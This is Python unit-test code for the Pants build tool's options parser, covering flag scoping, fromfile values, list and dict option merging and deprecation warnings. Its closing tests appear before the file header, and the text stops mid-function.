# instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags="fromfile", config={"fromfile": {dest: f"@{fromfile}"}})
self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
def parse_func(dest, fromfile):
return self._parse(
flags="fromfile", env={f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"}
)
self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".json", binary_mode=False) as fp:
json.dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{"dictvalue"}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_yaml(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".yaml", binary_mode=False) as fp:
yaml.safe_dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{"dictvalue"}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_error(self) -> None:
options = self._parse(flags="fromfile --string=@/does/not/exist")
with self.assertRaises(FromfileError):
options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
self.assertEqual("@/does/not/exist", options.for_scope("fromfile").string)
def test_ranked_value_equality(self) -> None:
none = RankedValue(Rank.NONE, None)
some = RankedValue(Rank.HARDCODED, "some")
self.assertEqual(RankedValue(Rank.NONE, None), none)
self.assertEqual(RankedValue(Rank.HARDCODED, "some"), some)
self.assertNotEqual(some, none)
self.assertEqual(some, RankedValue(Rank.HARDCODED, "some"))
self.assertNotEqual(some, RankedValue(Rank.HARDCODED, "few"))
self.assertNotEqual(some, RankedValue(Rank.CONFIG, "some"))
def test_pants_global_designdoc_example(self) -> None:
# The example from the design doc.
# Get defaults from config and environment.
config = {
"GLOBAL": {"b": "99"},
"compile": {"a": "88", "c": "77"},
}
env = {"PANTS_COMPILE_C": "66"}
options = self._parse(
flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
)
self.assertEqual(1, options.for_global_scope().a)
self.assertEqual(99, options.for_global_scope().b)
with self.assertRaises(AttributeError):
options.for_global_scope().c
self.assertEqual(1, options.for_scope("compile").a)
self.assertEqual(2, options.for_scope("compile").b)
self.assertEqual(66, options.for_scope("compile").c)
self.assertEqual(3, options.for_scope("compile.java").a)
self.assertEqual(2, options.for_scope("compile.java").b)
self.assertEqual(4, options.for_scope("compile.java").c)
def test_invalid_option_errors(self) -> None:
self.maxDiff = None
def parse_joined_command_line(*args):
bootstrap_options = create_options(
{
GLOBAL_SCOPE: {
# Set the Levenshtein edit distance to search for misspelled options.
"option_name_check_distance": 2,
# If bootstrap option values are provided, this option is accessed and must be provided.
"spec_files": [],
},
}
)
return self._parse(
flags=safe_shlex_join(list(args)),
bootstrap_option_values=bootstrap_options.for_global_scope(),
)
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flag '--aasdf' on global scope.\n\n(Run `./pants "
"help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flags on global scope: --aasdf, --aasdy.\n\n(Run "
"`./pants help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf", "--aasdy").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flags on global scope: -v, --config-overridden, --c.
Suggestions:
-v: [--v2, --verbose, --a, --b, --y, -n, -z, --compile-c]
--config-overridden: [--config-override]
--c: [--compile-c, --compile-scala-modifycompile, --compile-scala-modifylogs, --compile-scala-modifypassthrough, --config-override, --a, --b, --y, -n, -z, --v2]
(Run `./pants help-advanced` for all available options.)"""
),
):
parse_joined_command_line(
# A nonexistent short-form option -- other short-form options should be displayed.
"-vd",
# An incorrect form of `--config-override=val` (`ridden` instead of `ride`) should
# show the correct option name.
"--config-overridden=val",
# An option name without the correct prefix scope should match all flags with the
# same or similar unscoped option names.
"--c=[]",
).for_global_scope()
# Test when only some flags have suggestsions.
with self.assertRaisesWithMessage(
ParseError,
(
"Unrecognized command line flags on global scope: --aasdf, --config-overridden.\n"
"Suggestions:\n"
"--config-overridden: [--config-override]\n\n"
"(Run `./pants help-advanced` for all available options.)"
),
):
parse_joined_command_line("--aasdf", "--config-overridden").for_global_scope()
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--sam' on scope 'simple'. Suggestions:
--simple-spam, --simple-dashed-spam, --a, --num, --scoped-a-bit-spam, --scoped-and-dashed-spam
(Run `./pants help-advanced simple` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that misspelling searches work for options in non-global scopes.
"--simple-sam=val",
).for_scope("simple")
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--modifylogs' on scope 'compile'. Suggestions:
--compile-scala-modifylogs
(Run `./pants help-advanced compile` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that options with too shallow scoping match the correct option.
"--compile-modifylogs=val",
).for_scope("compile")
with self.assertRaisesWithMessage(
ParseError,
dedent(
"""\
Unrecognized command line flag '--modifylogs' on scope 'cache.compile.scala'.
Suggestions:
--compile-scala-modifylogs
(Run `./pants help-advanced cache.compile.scala` for all available options.)"""
),
):
parse_joined_command_line(
# Verify that options with too deep scoping match the correct option.
"--cache-compile-scala-modifylogs=val",
).for_scope("cache.compile.scala")
def test_pants_global_with_default(self) -> None:
"""This test makes sure values under [DEFAULT] still gets read."""
# This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
# tell us that we can remove the cast.
config = cast(
Dict[str, Dict[str, Any]], {"DEFAULT": {"b": "99"}, "GLOBAL": {"store_true_flag": True}}
)
global_options = self._parse(config=config).for_global_scope()
self.assertEqual(99, global_options.b)
self.assertTrue(global_options.store_true_flag)
def test_double_registration(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options.register(GLOBAL_SCOPE, "--foo-bar")
with self.assertRaises(OptionAlreadyRegistered):
options.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
# We serialize options to JSON e.g., when uploading stats.
# This test spot-checks that enum types can be serialized.
options = self._parse(flags="enum-opt --some-enum=another-value")
json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
def test_scope_deprecation(self) -> None:
# Note: This test demonstrates that two different new scopes can deprecate the same
# old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
class DummyOptionable1(Optionable):
options_scope = "new-scope1"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
class DummyOptionable2(Optionable):
options_scope = "new-scope2"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
options = Options.create(
env={},
config=self._create_config(
{
"GLOBAL": {"inherited": "aa"},
DummyOptionable1.options_scope: {"foo": "xx"},
DummyOptionable1.deprecated_options_scope: {
"foo": "yy",
"bar": "zz",
"baz": "ww",
"qux": "uu",
},
}
),
known_scope_infos=[
global_scope(),
DummyOptionable1.get_scope_info(),
DummyOptionable2.get_scope_info(),
],
args=shlex.split("./pants --new-scope1-baz=vv"),
)
options.register(GLOBAL_SCOPE, "--inherited")
options.register(DummyOptionable1.options_scope, "--foo")
options.register(DummyOptionable1.options_scope, "--bar")
options.register(DummyOptionable1.options_scope, "--baz")
options.register(DummyOptionable2.options_scope, "--qux")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.options_scope)
# Check that we got a warning, but not for the inherited option.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertNotIn("inherited", str(single_warning_dummy1.message))
# Check values.
# Deprecated scope takes precedence at equal rank.
self.assertEqual("yy", vals1.foo)
self.assertEqual("zz", vals1.bar)
# New scope takes precedence at higher rank.
self.assertEqual("vv", vals1.baz)
with self.warnings_catcher() as w:
vals2 = options.for_scope(DummyOptionable2.options_scope)
# Check that we got a warning.
single_warning_dummy2 = assert_single_element(w)
self.assertEqual(single_warning_dummy2.category, DeprecationWarning)
self.assertNotIn("inherited", str(single_warning_dummy2.message))
# Check values.
self.assertEqual("uu", vals2.qux)
def test_scope_deprecation_parent(self) -> None:
# Note: This test demonstrates that a scope can mark itself as deprecating a subscope of
# another scope.
class DummyOptionable1(Optionable):
options_scope = "test"
options_scope_category = ScopeInfo.SUBSYSTEM
@classmethod
def register_options(cls, register):
super().register_options(register)
register("--bar")
class DummyOptionable2(Optionable):
options_scope = "lint"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "test.a-bit-linty"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
@classmethod
def register_options(cls, register):
super().register_options(register)
register("--foo")
known_scope_infos = (
[global_scope()]
+ list(DummyOptionable1.known_scope_infos())
+ list(DummyOptionable2.known_scope_infos())
)
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=known_scope_infos,
args=shlex.split("./pants --test-a-bit-linty-foo=vv"),
)
# NB: Order matters here, because Optionables are typically registered in sorted order.
DummyOptionable2.register_options_on_scope(options)
DummyOptionable1.register_options_on_scope(options)
with self.warnings_catcher() as w:
vals = options.for_scope(DummyOptionable2.options_scope)
# Check that we got a warning, but also the correct value.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertEqual("vv", vals.foo)
def test_scope_deprecation_defaults(self) -> None:
# Confirms that a DEFAULT option does not trigger deprecation warnings for a deprecated scope.
class DummyOptionable1(Optionable):
options_scope = "new-scope1"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
options = Options.create(
env={},
config=self._create_config(
{"DEFAULT": {"foo": "aa"}, DummyOptionable1.options_scope: {"foo": "xx"}}
),
known_scope_infos=[global_scope(), DummyOptionable1.get_scope_info()],
args=shlex.split("./pants"),
)
options.register(DummyOptionable1.options_scope, "--foo")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.options_scope)
# Check that we got no warnings and that the actual scope took precedence.
self.assertEqual(0, len(w))
self.assertEqual("xx", vals1.foo)
def test_scope_dependency_deprecation(self) -> None:
# Test that a dependency scope can be deprecated.
class DummyOptionable1(Optionable):
options_scope = "scope"
options_scope_category = ScopeInfo.SUBSYSTEM
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[
global_scope(),
DummyOptionable1.get_scope_info(),
# A deprecated, scoped dependency on `DummyOptionable1`. This
# imitates the construction of SubsystemClientMixin.known_scope_infos.
ScopeInfo(
DummyOptionable1.subscope("sub"),
ScopeInfo.SUBSYSTEM,
DummyOptionable1,
removal_version="9999.9.9.dev0",
removal_hint="Sayonara!",
),
],
args=shlex.split("./pants --scope-sub-foo=vv"),
)
options.register(DummyOptionable1.options_scope, "--foo")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.subscope("sub"))
# Check that we got a warning, but also the correct value.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertEqual("vv", vals1.foo)
| # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import shlex
import unittest.mock
from enum import Enum
from functools import partial
from textwrap import dedent
from typing import Any, Dict, List, Optional, Union, cast
import toml
import yaml
from packaging.version import Version
from pants.base.deprecated import CodeRemovedError
from pants.base.hash_utils import CoercingEncoder
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
FromfileError,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDash,
OptionNameDoubleDash,
ParseError,
RecursiveSubsystemOption,
Shadowing,
)
from pants.option.global_options import GlobalOptions
from pants.option.optionable import Optionable
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.testutil.option.fakes import create_options
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import temporary_file, temporary_file_path
from pants.util.dirutil import safe_mkdtemp
from pants.util.strutil import safe_shlex_join
_FAKE_CUR_VERSION = "1.0.0.dev0"
def global_scope() -> ScopeInfo:
return ScopeInfo(GLOBAL_SCOPE, ScopeInfo.GLOBAL, GlobalOptions)
def task(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.TASK)
def intermediate(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)
def subsystem(scope: str) -> ScopeInfo:
return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class OptionsTest(TestBase):
@staticmethod
def _create_config(config: Optional[Dict[str, Dict[str, str]]] = None) -> Config:
with open(os.path.join(safe_mkdtemp(), "test_config.toml"), "w") as fp:
toml.dump(config or {}, fp)
return Config.load(config_paths=[fp.name])
def _parse(
self,
*,
flags: str = "",
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, Any]]] = None,
bootstrap_option_values=None,
) -> Options:
args = ["./pants", *shlex.split(flags)]
options = Options.create(
env=env or {},
config=self._create_config(config),
known_scope_infos=OptionsTest._known_scope_infos,
args=args,
bootstrap_option_values=bootstrap_option_values,
)
self._register(options)
return options
_known_scope_infos = [
global_scope(),
intermediate("compile"),
task("compile.java"),
task("compile.scala"),
task("cache.compile.scala"),
intermediate("stale"),
intermediate("test"),
task("test.junit"),
subsystem("passconsumer"),
task("simple"),
task("simple-dashed"),
task("scoped.a.bit"),
task("scoped.and-dashed"),
task("fromfile"),
task("fingerprinting"),
task("enum-opt"),
task("separate-enum-opt-scope"),
]
class SomeEnumOption(Enum):
a_value = "a-value"
another_value = "another-value"
def _register(self, options):
def register_global(*args, **kwargs):
options.register(GLOBAL_SCOPE, *args, **kwargs)
register_global("-z", "--verbose", type=bool, help="Verbose output.", recursive=True)
register_global("-n", "--num", type=int, default=99, recursive=True, fingerprint=True)
register_global("--y", type=list, member_type=int)
register_global(
"--v2", help="Two-letter long-form option, used to test option name suggestions."
)
register_global("--config-override", type=list)
register_global("--pants-foo")
register_global("--bar-baz")
register_global("--store-true-flag", type=bool, fingerprint=True)
register_global("--store-false-flag", type=bool, implicit_value=False)
register_global("--store-true-def-true-flag", type=bool, default=True)
register_global("--store-true-def-false-flag", type=bool, default=False)
register_global(
"--store-false-def-false-flag", type=bool, implicit_value=False, default=False
)
register_global(
"--store-false-def-true-flag", type=bool, implicit_value=False, default=True
)
register_global("--def-unset-bool-flag", type=bool, default=UnsetBool)
# Choices.
register_global("--str-choices", choices=["foo", "bar"])
register_global("--int-choices", choices=[42, 99], type=list, member_type=int)
# Custom types.
register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
register_global("--dicty", type=dict, default='{"a": "b"}')
register_global(
"--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
)
register_global("--targety", type=target_option, default="//:a")
register_global(
"--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
)
register_global("--filey", type=file_option, default=None)
register_global("--file-listy", type=list, member_type=file_option)
register_global(
"--shell-str-listy",
type=list,
member_type=shell_str,
default="--default1 --default2=test",
)
# Implicit value.
register_global("--implicit-valuey", default="default", implicit_value="implicit")
# For the design doc example test.
register_global("--a", type=int, recursive=True)
register_global("--b", type=int, recursive=True)
# Deprecated global options
register_global(
"--global-crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty global option",
)
register_global(
"--global-crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty global options",
)
register_global(
"--global-delayed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version="500.0.0.dev0",
)
register_global(
"--global-delayed-but-already-passed-deprecated-option",
removal_version="999.99.9.dev0",
deprecation_start_version=_FAKE_CUR_VERSION,
)
# Test that an option past the `removal_version` fails at option registration time.
with self.assertRaises(CodeRemovedError):
register_global(
"--global-crufty-expired",
removal_version="0.0.1.dev0",
removal_hint="use a less crufty global option",
)
# Mutual Exclusive options
register_global("--mutex-foo", mutually_exclusive_group="mutex")
register_global("--mutex-bar", mutually_exclusive_group="mutex")
register_global("--mutex-baz", mutually_exclusive_group="mutex")
register_global("--new-name")
register_global("--old-name", mutually_exclusive_group="new_name")
# For the design doc example test.
options.register("compile", "--c", type=int, recursive=True)
# Test deprecated options with a scope
options.register("stale", "--still-good")
options.register(
"stale",
"--crufty",
removal_version="999.99.9.dev0",
removal_hint="use a less crufty stale scoped option",
)
options.register(
"stale",
"--crufty-boolean",
type=bool,
removal_version="999.99.9.dev0",
removal_hint="say no to crufty, stale scoped options",
)
# Test mutual exclusive options with a scope
options.register("stale", "--mutex-a", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--mutex-b", mutually_exclusive_group="crufty_mutex")
options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
options.register("stale", "--crufty-new")
# For task identity test
options.register("compile.scala", "--modifycompile", fingerprint=True)
options.register("compile.scala", "--modifylogs")
options.register(
"compile.scala",
"--modifypassthrough",
fingerprint=True,
passthrough=True,
type=list,
member_type=str,
)
# For scoped env vars test
options.register("simple", "--spam")
options.register("simple-dashed", "--spam")
options.register("scoped.a.bit", "--spam")
options.register("scoped.and-dashed", "--spam")
# For fromfile test
options.register("fromfile", "--string")
options.register("fromfile", "--intvalue", type=int)
options.register("fromfile", "--dictvalue", type=dict)
options.register("fromfile", "--listvalue", type=list)
options.register("fromfile", "--appendvalue", type=list, member_type=int)
# For fingerprint tests
options.register("fingerprinting", "--inverted") # Implicitly: daemon=True
options.register("fingerprinting", "--definitely-not-inverted", daemon=False)
options.register("fingerprinting", "--fingerprinted", fingerprint=True)
options.register("fingerprinting", "--definitely-not-fingerprinted", fingerprint=False)
# For enum tests
options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
# For testing the default value
options.register(
"separate-enum-opt-scope",
"--some-enum-with-default",
default=self.SomeEnumOption.a_value,
type=self.SomeEnumOption,
)
def test_env_var_of_type_int(self) -> None:
create_options_object = partial(
Options.create,
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options = create_options_object(env={"PANTS_FOO_BAR": "123"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
self.assertEqual(123, options.for_global_scope().foo_bar)
options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
self.assertEqual([123, 456], options.for_global_scope().foo_bar)
def test_arg_scoping(self) -> None:
# Some basic smoke tests.
options = self._parse(flags="--verbose")
self.assertEqual(True, options.for_global_scope().verbose)
options = self._parse(flags="-z compile path/to/tgt")
self.assertEqual(["path/to/tgt"], options.specs)
self.assertEqual(True, options.for_global_scope().verbose)
with self.assertRaises(ParseError):
self._parse(flags="--unregistered-option compile").for_global_scope()
# Scoping of different values of the same option.
# Also tests the --no-* boolean flag inverses.
options = self._parse(flags="--verbose compile.java --no-verbose")
self.assertEqual(True, options.for_global_scope().verbose)
self.assertEqual(True, options.for_scope("compile").verbose)
self.assertEqual(False, options.for_scope("compile.java").verbose)
options = self._parse(
flags="--verbose compile --no-verbose compile.java -z test test.junit --no-verbose"
)
self.assertEqual(True, options.for_global_scope().verbose)
self.assertEqual(False, options.for_scope("compile").verbose)
self.assertEqual(True, options.for_scope("compile.java").verbose)
self.assertEqual(True, options.for_scope("test").verbose)
self.assertEqual(False, options.for_scope("test.junit").verbose)
# Test list-typed option.
global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
self.assertEqual([88, -99], global_options.y)
global_options = self._parse(
flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
).for_global_scope()
self.assertEqual([88, -99, 5, -6, 77], global_options.y)
global_options = self._parse().for_global_scope()
self.assertEqual([], global_options.y)
global_options = self._parse(
env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
).for_global_scope()
self.assertEqual(["123", "456"], global_options.config_override)
global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
self.assertEqual([""], global_options.config_override)
global_options = self._parse(
flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
).for_global_scope()
self.assertEqual([1, 2], global_options.listy)
# Test dict-typed option.
global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
self.assertEqual({"c": "d"}, global_options.dicty)
# Test list-of-dict-typed option.
global_options = self._parse(
flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
).for_global_scope()
self.assertEqual([{"c": "d"}, {"e": "f"}], global_options.dict_listy)
# Test target-typed option.
global_options = self._parse().for_global_scope()
self.assertEqual("//:a", global_options.targety)
global_options = self._parse(flags="--targety=//:foo").for_global_scope()
self.assertEqual("//:foo", global_options.targety)
# Test list-of-target-typed option.
global_options = self._parse(
flags='--target-listy=\'["//:foo", "//:bar"]\''
).for_global_scope()
self.assertEqual(["//:foo", "//:bar"], global_options.target_listy)
# Test file-typed option.
with temporary_file_path() as fp:
global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
self.assertEqual(fp, global_options.filey)
# Test list-of-file-typed option.
with temporary_file_path() as fp1:
with temporary_file_path() as fp2:
global_options = self._parse(
flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
).for_global_scope()
self.assertEqual([fp1, fp2], global_options.file_listy)
def test_explicit_boolean_values(self) -> None:
def assert_boolean_value(*, arg: str, expected: bool) -> None:
global_options = self._parse(flags=f"--verbose={arg}").for_global_scope()
assert global_options.verbose is expected
assert_boolean_value(arg="false", expected=False)
assert_boolean_value(arg="False", expected=False)
assert_boolean_value(arg="true", expected=True)
assert_boolean_value(arg="True", expected=True)
def test_boolean_defaults(self) -> None:
global_options = self._parse().for_global_scope()
self.assertFalse(global_options.store_true_flag)
self.assertTrue(global_options.store_false_flag)
self.assertFalse(global_options.store_true_def_false_flag)
self.assertTrue(global_options.store_true_def_true_flag)
self.assertFalse(global_options.store_false_def_false_flag)
self.assertTrue(global_options.store_false_def_true_flag)
self.assertIsNone(global_options.def_unset_bool_flag)
def test_boolean_set_option(self) -> None:
global_options = self._parse(
flags="--store-true-flag --store-false-flag --store-true-def-true-flag "
"--store-true-def-false-flag --store-false-def-true-flag --store-false-def-false-flag "
"--def-unset-bool-flag"
).for_global_scope()
self.assertTrue(global_options.store_true_flag)
self.assertFalse(global_options.store_false_flag)
self.assertTrue(global_options.store_true_def_false_flag)
self.assertTrue(global_options.store_true_def_true_flag)
self.assertFalse(global_options.store_false_def_false_flag)
self.assertFalse(global_options.store_false_def_true_flag)
self.assertTrue(global_options.def_unset_bool_flag)
def test_boolean_negate_option(self) -> None:
global_options = self._parse(
flags="--no-store-true-flag --no-store-false-flag --no-store-true-def-true-flag "
"--no-store-true-def-false-flag --no-store-false-def-true-flag "
"--no-store-false-def-false-flag --no-def-unset-bool-flag"
).for_global_scope()
self.assertFalse(global_options.store_true_flag)
self.assertTrue(global_options.store_false_flag)
self.assertFalse(global_options.store_true_def_false_flag)
self.assertFalse(global_options.store_true_def_true_flag)
self.assertTrue(global_options.store_false_def_false_flag)
self.assertTrue(global_options.store_false_def_true_flag)
self.assertFalse(global_options.def_unset_bool_flag)
def test_boolean_config_override(self) -> None:
def assert_options_set(value: bool) -> None:
global_options = self._parse(
config={
"DEFAULT": {
"store_true_flag": value,
"store_false_flag": value,
"store_true_def_true_flag": value,
"store_true_def_false_flag": value,
"store_false_def_true_flag": value,
"store_false_def_false_flag": value,
"def_unset_bool_flag": value,
},
},
).for_global_scope()
assert global_options.store_true_flag == value
assert global_options.store_false_flag == value
assert global_options.store_true_def_false_flag == value
assert global_options.store_true_def_true_flag == value
assert global_options.store_false_def_false_flag == value
assert global_options.store_false_def_true_flag == value
assert global_options.def_unset_bool_flag == value
assert_options_set(False)
assert_options_set(True)
def test_boolean_invalid_value(self) -> None:
def assert_invalid_value(val) -> None:
with self.assertRaises(BooleanConversionError):
self._parse(config={"DEFAULT": {"store_true_flag": val}}).for_global_scope()
assert_invalid_value(11)
assert_invalid_value("AlmostTrue")
def test_list_option(self) -> None:
def check(
*,
expected: List[int],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.listy == expected
default = [1, 2, 3]
check(expected=default)
# Appending to the default.
check(flags="--listy=4", expected=[*default, 4])
check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
# Filtering from the default.
check(flags="--listy=-[2]", expected=[1, 3])
# Replacing the default.
check(flags="--listy=[4,5]", expected=[4, 5])
# Appending across env, config and flags (in the right order).
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="+[4,5]",
expected=[*default, 4, 5, 6, 7, 8, 9],
)
# Appending and filtering across env, config and flags (in the right order).
check(
flags="--listy=-[1,5,6]", env_val="+[6,7]", config_val="+[4,5]", expected=[2, 3, 4, 7],
)
check(
flags="--listy=+[8,9]",
env_val="-[4,5]",
config_val="+[4,5],-[3]",
expected=[1, 2, 8, 9],
)
# Overwriting from env, then appending and filtering.
check(
flags="--listy=+[8,9],-[6]", env_val="[6,7]", config_val="+[4,5]", expected=[7, 8, 9],
)
# Overwriting from config, then appending.
check(
flags="--listy=+[8,9]",
env_val="+[6,7]",
config_val="[4,5]",
expected=[4, 5, 6, 7, 8, 9],
)
# Overwriting from flags.
check(
flags="--listy=[8,9]", env_val="+[6,7]", config_val="+[4,5],-[8]", expected=[8, 9],
)
# Filtering all instances of repeated values.
check(
flags="--listy=-[5]",
config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
expected=[1, 2, 3, 4, 6],
)
# Filtering a value even though it was appended again at a higher rank.
check(
flags="--listy=+[4]", env_val="-[4]", config_val="+[4,5]", expected=[*default, 5],
)
# Filtering a value even though it was appended again at the same rank.
check(
env_val="-[4],+[4]", config_val="+[4,5]", expected=[*default, 5],
)
# Overwriting cancels filters.
check(env_val="[4]", config_val="-[4]", expected=[4])
def test_dict_list_option(self) -> None:
def check(
*,
expected: List[Dict[str, int]],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.dict_listy == expected
default = [{"a": 1, "b": 2}, {"c": 3}]
one_element_appended = [*default, {"d": 4, "e": 5}]
two_elements_appended = [*one_element_appended, {"f": 6}]
replaced = [{"d": 4, "e": 5}, {"f": 6}]
check(expected=default)
check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
check(
flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
expected=two_elements_appended,
)
check(
flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'', expected=two_elements_appended,
)
check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
def test_target_list_option(self) -> None:
def check(
*,
expected: List[str],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.target_listy == expected
default = ["//:a", "//:b"]
specified_args = ["//:c", "//:d"]
all_args = [*default, *specified_args]
check(expected=default)
check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
check(env_val="//:c", expected=[*default, "//:c"])
check(env_val='+["//:c", "//:d"]', expected=all_args)
check(env_val='["//:c", "//:d"]', expected=specified_args)
check(config_val="//:c", expected=[*default, "//:c"])
check(config_val='+["//:c", "//:d"]', expected=all_args)
check(config_val='["//:c", "//:d"]', expected=specified_args)
def test_shell_str_list(self) -> None:
def check(
*,
expected: List[str],
flags: str = "",
env_val: Optional[str] = None,
config_val: Optional[str] = None,
) -> None:
env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
